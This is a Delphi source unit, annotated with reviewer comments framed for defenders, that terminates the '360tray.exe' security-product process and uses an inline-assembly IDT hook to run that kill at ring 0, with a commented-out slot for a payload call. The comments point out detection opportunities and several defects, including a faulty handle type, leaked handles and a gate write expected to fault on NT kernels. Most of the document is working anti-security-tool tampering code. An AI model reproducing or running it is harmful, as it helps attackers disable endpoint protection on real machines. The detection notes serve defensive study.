unit Unit1;

{
  Review notes (defender stance). This unit contains two things worth
  recognising in an incident-response or detection context:

  1. exit360 enumerates processes with Toolhelp32 and terminates the one
     whose image name is '360tray.exe' (apparently the tray process of the
     360 security product), i.e. security-product tampering. The sequence
     visible in this code - CreateToolhelp32Snapshot, OpenProcess with
     PROCESS_ALL_ACCESS against a security product's process, then
     TerminateProcess - is the detection opportunity (process-access
     auditing such as Sysmon ProcessAccess events); protected-process /
     anti-tamper features in the product are the usual mitigation.

  2. Ring0ToRun overwrites an IDT gate from user mode via SIDT and then
     raises that interrupt so that exit360 runs as the handler. This only
     works where user-mode code can write to the IDT. NOTE(review): on an
     NT-family kernel the write to [ebx] is expected to fault rather than
     succeed - confirm the intended target platform before drawing
     conclusions from this code.
}

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, TlHelp32;

type
  // Main form: one button whose click handler invokes Ring0ToRun.
  TForm1 = class(TForm)
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

// Terminates the first process whose image name equals '360tray.exe'.
procedure exit360;

// Patches the IDT gate for vector ExceptionUsed to a local handler, raises
// the interrupt, and restores the gate; exit360 is called from the handler.
procedure Ring0ToRun; stdcall;

var
  Form1: TForm1;

implementation

{$R *.dfm}

{
  Walks a Toolhelp32 process snapshot and terminates the first entry whose
  szExeFile equals '360tray.exe'. No return value; failures are ignored.

  NOTE(review): the following defects are visible in this body and are left
  unchanged here:
    - phand is declared as HWND but receives a process handle from
      OpenProcess; it is then passed to GetWindowThreadProcessId, which
      expects a window handle, so that call is meaningless, its result is
      discarded, and it overwrites id.
    - TerminateProcess is given ExitCode, which is not declared in this
      unit and therefore resolves to the System unit's global ExitCode.
    - Neither the snapshot handle sn nor the process handle phand is ever
      closed, so both leak on every call.
    - The bare 'except end' swallows every exception. Because this
      procedure is also called from the interrupt handler in Ring0ToRun,
      that appears to be deliberate best-effort behaviour.
    - sn is used without checking for INVALID_HANDLE_VALUE; in that case
      Process32First returns False and the loop simply does not run.
}
procedure exit360;
var
  id: Cardinal;          // process id of the matching entry
  sn: THandle;           // Toolhelp32 snapshot handle
  boo: Boolean;          // result of Process32First / Process32Next
  lpp: TProcessEntry32;  // current snapshot entry
  phand: HWND;           // holds the OpenProcess result (see note above)
begin
  sn := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  lpp.dwSize := SizeOf(lpp);  // must be set before the first Process32First call
  try
    boo := Process32First(sn, lpp);
    while boo do
    begin
      // case-sensitive comparison against the fixed-size image name field
      if lpp.szExeFile = '360tray.exe' then
      begin
        //Result:=lpp.szExeFile;
        id := lpp.th32ProcessID;
        phand := OpenProcess(PROCESS_ALL_ACCESS, False, id);
        GetWindowThreadProcessId(phand, id);  // see note: phand is not a window handle
        TerminateProcess(phand, ExitCode);    // ExitCode is System.ExitCode here
        Break;
      end;
      boo := Process32Next(sn, lpp);
    end;
  except
    // intentionally swallowed; see note above
  end;
end;

{
  Hooks interrupt vector ExceptionUsed in the IDT, triggers it so that the
  code at @@Ring0Code runs as the interrupt handler (which calls exit360),
  then restores the original gate. Written entirely in inline assembly.

  NOTE(review) - observations, none of them changed here:
    - cli is executed but no sti follows. IRETD restores the EFLAGS image
      pushed by 'int', which was taken after cli, so IF is presumably still
      clear when control reaches the restore sequence - confirm.
    - The 'ret' before @@Ring0Code leaves the routine without the
      compiler-generated epilogue; correctness depends on how the compiler
      laid out the frame for the two locals - confirm.
    - lpOldGate is a 4-byte DWORD: only the two 16-bit offset halves of the
      8-byte gate are saved and restored; the other gate fields are never
      written.
    - exit360 (Delphi RTL + Win32 API calls) is invoked from interrupt
      context.
}
procedure Ring0ToRun; stdcall;
const
  ExceptionUsed = $03;  // interrupt vector number (the author notes other vectors, e.g. $05, could be used)
var
  IDT: array [0..5] of byte;  // 6-byte IDTR image written by SIDT: 16-bit limit, 32-bit base
  lpOldGate: DWORD;           // original handler offset (author's comment says 8 bytes; the variable is 4)
begin
  asm
    sidt IDT                        // store IDTR into IDT
    mov ebx, dword ptr [IDT+2]      // bytes 2..5 of the IDTR image are the IDT base address
    add ebx, 8*ExceptionUsed        // each gate is 8 bytes; ebx -> gate for ExceptionUsed
    cli                             // disable interrupts while the gate is modified
    mov dx, word ptr [ebx+6]        // gate bytes 6..7: high word of the handler offset
    shl edx, 16d                    // shift it into the high 16 bits of edx
    mov dx, word ptr [ebx]          // gate bytes 0..1: low word of the handler offset
    mov [lpOldGate], edx            // save the original handler offset
    mov eax, offset @@Ring0Code     // new handler offset: the code at @@Ring0Code
    mov word ptr [ebx], ax          // write low word of the new offset
    shr eax, 16d
    mov word ptr [ebx+6], ax        // write high word of the new offset
    int ExceptionUsed               // raise the interrupt; the CPU dispatches to @@Ring0Code
    mov ebx, dword ptr [IDT+2]      // re-derive the gate address
    add ebx, 8*ExceptionUsed
    mov edx, [lpOldGate]
    mov word ptr [ebx], dx          // restore low word of the original offset
    shr edx, 16d
    mov word ptr [ebx+6], dx        // restore high word of the original offset
    ret                             // returns directly; see note above
  @@Ring0Code:                      // interrupt handler body
    push es                         // preserve segment registers and general registers
    push ds
    pushad
    //call SendCommand              // (author's original note: the payload routine would be called here)
    call exit360
    popad
    pop ds
    pop es
    iretd                           // return from interrupt
  end;
end;

// Button handler: runs the IDT hook routine.
procedure TForm1.Button1Click(Sender: TObject);
begin
  Ring0ToRun;
end;

end.